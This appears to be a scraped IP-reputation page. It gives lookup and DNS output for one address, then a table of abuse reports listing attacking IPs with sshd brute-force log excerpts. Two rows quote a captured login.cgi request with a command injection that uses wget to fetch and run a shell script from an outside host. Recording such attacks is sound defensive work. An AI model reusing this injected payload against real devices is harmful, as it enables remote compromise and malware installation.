城市(city): unknown
省份(region): unknown
国家(country): United States of America (the)
运营商(isp): unknown
主机名(hostname): unknown
机构(organization): unknown
使用类型(Usage Type): unknown
b
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 99.131.207.142
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 36133
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
;; QUESTION SECTION:
;99.131.207.142. IN A
;; AUTHORITY SECTION:
. 30 IN SOA a.root-servers.net. nstld.verisign-grs.com. 2025020901 1800 900 604800 86400
;; Query time: 11 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Mon Feb 10 06:10:43 CST 2025
;; MSG SIZE rcvd: 107
Host 142.207.131.99.in-addr.arpa not found: 2(SERVFAIL)
;; Got SERVFAIL reply from 183.60.83.19, trying next server
Server: 183.60.82.98
Address: 183.60.82.98#53
** server can't find 142.207.131.99.in-addr.arpa: SERVFAIL
| IP | 类型 | 评论内容 | 时间 |
|---|---|---|---|
| 197.34.200.86 | attackspam | 1 attack on wget probes like: 197.34.200.86 - - [22/Dec/2019:16:01:37 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 21:12:35 |
| 222.186.175.202 | attackspambots | Dec 23 13:46:37 sd-53420 sshd\[32619\]: User root from 222.186.175.202 not allowed because none of user's groups are listed in AllowGroups Dec 23 13:46:37 sd-53420 sshd\[32619\]: Failed none for invalid user root from 222.186.175.202 port 31924 ssh2 Dec 23 13:46:38 sd-53420 sshd\[32619\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=222.186.175.202 user=root Dec 23 13:46:40 sd-53420 sshd\[32619\]: Failed password for invalid user root from 222.186.175.202 port 31924 ssh2 Dec 23 13:46:43 sd-53420 sshd\[32619\]: Failed password for invalid user root from 222.186.175.202 port 31924 ssh2 ... |
2019-12-23 20:53:48 |
| 80.227.68.4 | attackbots | Dec 23 13:22:02 silence02 sshd[4460]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.227.68.4 Dec 23 13:22:04 silence02 sshd[4460]: Failed password for invalid user 123456 from 80.227.68.4 port 42966 ssh2 Dec 23 13:29:28 silence02 sshd[4679]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.227.68.4 |
2019-12-23 21:22:42 |
| 106.13.65.18 | attackspambots | Fail2Ban - SSH Bruteforce Attempt |
2019-12-23 21:12:01 |
| 113.182.152.22 | attackbotsspam | Unauthorized connection attempt from IP address 113.182.152.22 on Port 445(SMB) |
2019-12-23 20:50:17 |
| 207.236.200.70 | attackspam | Dec 23 13:51:59 SilenceServices sshd[23640]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=207.236.200.70 Dec 23 13:52:01 SilenceServices sshd[23640]: Failed password for invalid user johnathan from 207.236.200.70 port 57532 ssh2 Dec 23 13:57:41 SilenceServices sshd[25213]: Failed password for root from 207.236.200.70 port 33674 ssh2 |
2019-12-23 21:11:12 |
| 80.211.80.154 | attack | 2019-12-23T06:20:04.052308dmca.cloudsearch.cf sshd[4650]: Invalid user ria2000 from 80.211.80.154 port 49126 2019-12-23T06:20:04.058827dmca.cloudsearch.cf sshd[4650]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.80.154 2019-12-23T06:20:04.052308dmca.cloudsearch.cf sshd[4650]: Invalid user ria2000 from 80.211.80.154 port 49126 2019-12-23T06:20:05.692519dmca.cloudsearch.cf sshd[4650]: Failed password for invalid user ria2000 from 80.211.80.154 port 49126 ssh2 2019-12-23T06:24:54.173788dmca.cloudsearch.cf sshd[4721]: Invalid user diandrea from 80.211.80.154 port 53192 2019-12-23T06:24:54.183013dmca.cloudsearch.cf sshd[4721]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=80.211.80.154 2019-12-23T06:24:54.173788dmca.cloudsearch.cf sshd[4721]: Invalid user diandrea from 80.211.80.154 port 53192 2019-12-23T06:24:56.960928dmca.cloudsearch.cf sshd[4721]: Failed password for invalid user diandrea from 80. ... |
2019-12-23 21:09:06 |
| 183.83.170.30 | attack | Attempt to attack host OS, exploiting network vulnerabilities, on 23-12-2019 06:25:11. |
2019-12-23 20:44:27 |
| 128.74.168.241 | attackbotsspam | Attempt to attack host OS, exploiting network vulnerabilities, on 23-12-2019 06:25:10. |
2019-12-23 20:49:11 |
| 89.216.124.253 | attackbots | 10 attempts against mh-misc-ban on heat.magehost.pro |
2019-12-23 20:51:49 |
| 218.31.33.34 | attack | Dec 23 10:58:24 legacy sshd[12481]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.31.33.34 Dec 23 10:58:26 legacy sshd[12481]: Failed password for invalid user minecraft from 218.31.33.34 port 42994 ssh2 Dec 23 11:05:36 legacy sshd[12810]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.31.33.34 ... |
2019-12-23 21:14:16 |
| 41.45.97.45 | attackbotsspam | 1 attack on wget probes like: 41.45.97.45 - - [22/Dec/2019:20:23:35 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11 |
2019-12-23 21:10:53 |
| 83.240.245.242 | attack | Dec 23 07:40:02 plusreed sshd[2349]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.240.245.242 user=root Dec 23 07:40:04 plusreed sshd[2349]: Failed password for root from 83.240.245.242 port 50943 ssh2 Dec 23 07:51:16 plusreed sshd[5165]: Invalid user oseid from 83.240.245.242 Dec 23 07:51:16 plusreed sshd[5165]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=83.240.245.242 Dec 23 07:51:16 plusreed sshd[5165]: Invalid user oseid from 83.240.245.242 Dec 23 07:51:18 plusreed sshd[5165]: Failed password for invalid user oseid from 83.240.245.242 port 51369 ssh2 ... |
2019-12-23 20:53:05 |
| 54.37.136.87 | attackbotsspam | $f2bV_matches |
2019-12-23 21:16:26 |
| 79.137.72.171 | attackbots | Dec 23 16:35:35 areeb-Workstation sshd[12839]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=79.137.72.171 Dec 23 16:35:37 areeb-Workstation sshd[12839]: Failed password for invalid user boony from 79.137.72.171 port 34010 ssh2 ... |
2019-12-23 21:21:59 |